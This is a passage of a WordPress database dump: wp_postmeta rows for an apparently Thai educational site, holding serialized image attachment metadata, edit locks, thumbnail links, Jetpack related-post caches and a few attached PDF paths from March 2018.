(5738, 1899, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2018/03/28870515_552413485134844_5365049850813480960_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"28870515_552413485134844_5365049850813480960_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"28870515_552413485134844_5365049850813480960_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"28870515_552413485134844_5365049850813480960_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"28870515_552413485134844_5365049850813480960_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"28870515_552413485134844_5365049850813480960_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5739, 1898, '_thumbnail_id', '1899'),
(5743, 1898, '_hide_featured', NULL),
(5744, 1898, '_wpas_done_all', '1'),
(5745, 1901, '_edit_lock', '1521099634:3'),
(5746, 1901, '_edit_last', '3'),
(5747, 1902, '_wp_attached_file', '2018/03/29216705_555369088172617_2170964238502199296_o.jpg'),
(5748, 1902, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1404;s:6:\"height\";i:1166;s:4:\"file\";s:58:\"2018/03/29216705_555369088172617_2170964238502199296_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"29216705_555369088172617_2170964238502199296_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"29216705_555369088172617_2170964238502199296_o-300x249.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:249;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"29216705_555369088172617_2170964238502199296_o-768x638.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:638;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"29216705_555369088172617_2170964238502199296_o-1024x850.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:850;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"29216705_555369088172617_2170964238502199296_o-361x300.jpg\";s:5:\"width\";i:361;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5749, 1901, '_thumbnail_id', '1902'),
(5753, 1901, '_hide_featured', NULL),
(5754, 1901, '_wpas_done_all', '1'),
(5757, 1901, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575427885;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6316;}i:1;a:1:{s:2:\"id\";i:5900;}i:2;a:1:{s:2:\"id\";i:6152;}}}}'),
(5758, 1861, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575725003;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6154;}i:1;a:1:{s:2:\"id\";i:4937;}i:2;a:1:{s:2:\"id\";i:4951;}}}}'),
(5759, 1904, '_wp_attached_file', '2018/03/14-3-2561-15-44-03.jpg'),
(5760, 1904, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:194;s:6:\"height\";i:242;s:4:\"file\";s:30:\"2018/03/14-3-2561-15-44-03.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"14-3-2561-15-44-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5761, 1905, '_wp_attached_file', '2018/03/14-3-2561-15-44-26.jpg'),
(5762, 1905, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:579;s:6:\"height\";i:158;s:4:\"file\";s:30:\"2018/03/14-3-2561-15-44-26.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"14-3-2561-15-44-26-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"14-3-2561-15-44-26-300x82.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:82;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"14-3-2561-15-44-26-400x109.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5769, 1848, '_publicize_pending', '1'),
(5770, 1848, '_hide_featured', NULL),
(5771, 1912, '_edit_lock', '1624856801:14'),
(5772, 1912, '_edit_last', '14'),
(5773, 1898, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575694481;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5141;}i:1;a:1:{s:2:\"id\";i:4157;}i:2;a:1:{s:2:\"id\";i:5172;}}}}'),
(5774, 1882, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575300223;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5378;}i:1;a:1:{s:2:\"id\";i:6334;}i:2;a:1:{s:2:\"id\";i:6158;}}}}'),
(5775, 1894, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575728105;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5162;}i:1;a:1:{s:2:\"id\";i:3958;}i:2;a:1:{s:2:\"id\";i:6119;}}}}'),
(5776, 1877, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575108172;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4166;}i:1;a:1:{s:2:\"id\";i:4160;}i:2;a:1:{s:2:\"id\";i:5301;}}}}'),
(5777, 1914, '_wp_attached_file', '2018/01/-ปวช-2561-e1521158423466.jpg'),
(5778, 1914, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:42:\"2018/01/-ปวช-2561-e1521158423466.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"-ปวช-2561-e1521158423466-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"-ปวช-2561-e1521158423466-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:43:\"-ปวช-2561-e1521158423466-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:43:\"-ปวช-2561-e1521158423466-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:42:\"-ปวช-2561-e1521158423466-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5779, 1914, '_wp_attachment_backup_sizes', 'a:6:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:19:\"-ปวช-2561.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:120:\"ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวช-2561-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:120:\"ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวช-2561-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:120:\"ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวช-2561-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:121:\"ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวช-2561-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"university-hub-thumb-orig\";a:4:{s:4:\"file\";s:120:\"ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวช-2561-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),
(5782, 1919, '_edit_lock', '1521610715:3'),
(5783, 1919, '_edit_last', '3'),
(5784, 1920, '_wp_attached_file', '2018/03/29343098_558100277899498_1702886925783793664_o.jpg'),
(5785, 1920, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1478;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2018/03/29343098_558100277899498_1702886925783793664_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"29343098_558100277899498_1702886925783793664_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"29343098_558100277899498_1702886925783793664_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"29343098_558100277899498_1702886925783793664_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"29343098_558100277899498_1702886925783793664_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"29343098_558100277899498_1702886925783793664_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5786, 1919, '_thumbnail_id', '1920'),
(5790, 1919, '_hide_featured', NULL),
(5791, 1919, '_wpas_done_all', '1'),
(5793, 1919, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575474960;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4166;}i:1;a:1:{s:2:\"id\";i:5378;}i:2;a:1:{s:2:\"id\";i:4265;}}}}'),
(5794, 1923, '_wp_attached_file', '2018/03/19-3-2561-9-50-06.jpg'),
(5795, 1923, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:194;s:6:\"height\";i:243;s:4:\"file\";s:29:\"2018/03/19-3-2561-9-50-06.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"19-3-2561-9-50-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5796, 1924, '_wp_attached_file', '2018/03/22-3-2561-9-49-18.jpg'),
(5797, 1924, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:582;s:6:\"height\";i:153;s:4:\"file\";s:29:\"2018/03/22-3-2561-9-49-18.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"22-3-2561-9-49-18-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"22-3-2561-9-49-18-300x79.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:79;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"22-3-2561-9-49-18-400x105.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:105;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5800, 1912, '_publicize_pending', '1'),
(5801, 1912, '_hide_featured', NULL),
(5802, 1928, '_wp_attached_file', '2018/03/22-3-2561-10-58-44.jpg'),
(5803, 1928, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:904;s:6:\"height\";i:630;s:4:\"file\";s:30:\"2018/03/22-3-2561-10-58-44.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"22-3-2561-10-58-44-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"22-3-2561-10-58-44-300x209.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:209;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"22-3-2561-10-58-44-768x535.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:535;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"22-3-2561-10-58-44-400x279.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5818, 1942, '_wp_attached_file', '2018/03/111111111.jpg'),
(5819, 1942, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:956;s:6:\"height\";i:627;s:4:\"file\";s:21:\"2018/03/111111111.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"111111111-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"111111111-300x197.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"111111111-768x504.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:504;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"111111111-400x262.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5820, 1944, '_wp_attached_file', '2018/03/54656452645.jpg'),
(5821, 1944, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:954;s:6:\"height\";i:629;s:4:\"file\";s:23:\"2018/03/54656452645.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"54656452645-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"54656452645-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"54656452645-768x506.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:506;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"54656452645-400x264.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:264;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5822, 1946, '_wp_attached_file', '2018/03/11111116666666.jpg'),
(5823, 1946, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:952;s:6:\"height\";i:624;s:4:\"file\";s:26:\"2018/03/11111116666666.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"11111116666666-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"11111116666666-300x197.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"11111116666666-768x503.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:503;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:26:\"11111116666666-400x262.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5824, 1948, '_wp_attached_file', '2018/03/2222222.jpg'),
(5825, 1948, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:954;s:6:\"height\";i:559;s:4:\"file\";s:19:\"2018/03/2222222.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"2222222-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"2222222-300x176.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"2222222-768x450.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:19:\"2222222-400x234.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:234;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5826, 1951, '_edit_lock', '1521695071:3'),
(5827, 1951, '_edit_last', '3'),
(5829, 1953, '_wp_attached_file', '2018/03/e-bidding-winner-4-objects.pdf'),
(5833, 1951, '_hide_featured', NULL),
(5834, 1951, '_wpas_done_all', '1'),
(5835, 1951, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1573677894;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5680;}i:1;a:1:{s:2:\"id\";i:4781;}i:2;a:1:{s:2:\"id\";i:5952;}}}}'),
(5836, 1955, '_edit_lock', '1521789972:3'),
(5837, 1955, '_edit_last', '3'),
(5838, 1956, '_wp_attached_file', '2018/03/เวรเดือนเมษายน2561.pdf'),
(5842, 1955, '_hide_featured', NULL),
(5843, 1955, '_wpas_done_all', '1'),
(5844, 1955, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1573649439;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4662;}i:1;a:1:{s:2:\"id\";i:5361;}i:2;a:1:{s:2:\"id\";i:4172;}}}}'),
(5845, 1958, '_edit_lock', '1522036089:3'),
(5846, 1958, '_edit_last', '3'),
(5847, 1959, '_wp_attached_file', '2018/03/28953695_561424490900410_9004530260358522663_o.jpg'),
(5848, 1959, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/03/28953695_561424490900410_9004530260358522663_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"28953695_561424490900410_9004530260358522663_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"28953695_561424490900410_9004530260358522663_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"28953695_561424490900410_9004530260358522663_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"28953695_561424490900410_9004530260358522663_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"28953695_561424490900410_9004530260358522663_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5849, 1958, '_thumbnail_id', '1959'),
(5853, 1958, '_hide_featured', NULL),
(5854, 1958, '_wpas_done_all', '1'),
(5855, 1961, '_edit_lock', '1522037332:3'),
(5856, 1961, '_edit_last', '3'),
(5857, 1962, '_wp_attached_file', '2018/03/29472837_559055741137285_2187482021297651712_o.jpg'),
